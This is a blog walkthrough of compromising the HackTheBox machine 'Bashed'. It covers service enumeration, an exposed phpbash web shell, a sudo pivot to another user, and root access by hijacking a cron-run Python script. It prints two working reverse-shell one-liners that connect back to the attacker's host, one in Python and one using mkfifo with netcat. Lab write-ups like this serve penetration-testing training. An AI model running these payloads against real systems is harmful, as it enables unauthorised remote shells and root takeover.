HackTheBox | Bashed

In this walkthrough, I demonstrate how I obtained complete ownership of Bashed on HackTheBox
HackTheBox | Bashed
In: TJ Null OSCP Practice, OSCP Prep, HackTheBox, Attack, CTF

Nmap Results

# Nmap 7.93 scan initiated Wed Mar 29 00:20:11 2023 as: nmap -Pn -p- -T5 -A -oN scan.txt
Nmap scan report for
Host is up (0.014s latency).
Not shown: 65534 closed tcp ports (reset)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 993/tcp)
1   12.31 ms
2   12.42 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 29 00:20:34 2023 -- 1 IP address (1 host up) scanned in 23.26 seconds

Service Enumeration


Interesting mention of 'phpbash'
gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/big.txt -r -x php,html -t 100 -o gobuster.txt

/about.html           (Status: 200) [Size: 8193]
/config.php           (Status: 200) [Size: 0]
/contact.html         (Status: 200) [Size: 7805]
/css                  (Status: 200) [Size: 1759]
/dev                  (Status: 200) [Size: 1149]
/fonts                (Status: 200) [Size: 2096]
/images               (Status: 200) [Size: 1565]
/index.html           (Status: 200) [Size: 7743]
/js                   (Status: 200) [Size: 3166]
/php                  (Status: 200) [Size: 940]
/scroll.html          (Status: 200) [Size: 10863]
/single.html          (Status: 200) [Size: 7477]
/uploads              (Status: 200) [Size: 14]

Looking at the output, the most immediately interesting resources are:

  • /dev/
  • /php/
  • /uploads

And just like that, we foudn the phpbash.php script:

Great, so we've got command execution on the target! Let's see if I can ping my VPN IP.

Excellent! We can communicate back to my Kali instance, so the prospects of a reverse shell have become that much more promising. Netcat is installed on the target, but does not support the -e parameter.

Python is installed on the target


The system administrator made globally readable a sensitive directory on the web server. This directory contains a PHP script that allows an unauthenticated user to execture arbitrary commands on the remote server. This directory should not be globally readable and ideally the development environment should be isolated away in a non-public network.

Reverse Shell

Attack Box

sudo rlwrap nc -lnvp 80


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<vpn-ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Substitute '<vpn-ip>' and '<port>' with the appropriate values

Post-Exploit Enumeration

Operating Environment

OS & Kernel

VERSION="16.04.2 LTS (Xenial Xerus)"
PRETTY_NAME="Ubuntu 16.04.2 LTS"
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

Users and Groups

Local Users


Local Groups



Network Configurations


ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:4b:66 brd ff:ff:ff:ff:ff:ff
    inet brd scope global ens33
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:4b66/64 scope global mngtmpaddr dynamic 
       valid_lft 86394sec preferred_lft 14394sec
    inet6 fe80::250:56ff:feb9:4b66/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

All open ports previously enumerated.

Interesting Files


Permission denied (see privilege escalation)


Permission denied (see privilege escalation)

Privilege Escalation

Lateral Pivot

The most obvious privilege escalation path from the initial access is the output from sudo -l command above when enumerating the current user, as it showed that we can run any command as the user scriptmanager without the need for a password. We can use this to spawn a Bash sub-process as the user scriptmanager.

sudo -u scriptmanager /bin/bash -ip

Spawn a Bash shell as the user 'scriptmanager'

More Enumeration

From before, we found the interesting /scripts directory, which is owned by the scriptsmanager user.

Read 'test.py'
Read 'test.txt'

There's nothing particularly useful about this script at first glance. It's just opening a file in write mode and adding the text, "testing 123!" to the file. But, you'll notice that the test.txt file that it's reading is owned by root.

That would lead me to believe that the root user has a cron job that runs this script at regular intervals, allowing us to control which file is read and written to using this script.

Test Script Modifications

Let's give it a test:

cd /scripts
cp test.py test.py.orig
sed -i 's/testing\ 123\!/0xBEN was here/' test.py

Overwrite 'testing 123!' with '0xBEN was here'

Then, we'll give it a minute or more to see if the file is overwritten with our new content.

Excellent! We can use this script to get a reverse shell as root.

Reverse Shell as Root

echo -e 'import os\nos.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [vpn-ip] [port] >/tmp/f")' > test.py

Replace [vpn-ip] and [port] with your respective values





More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.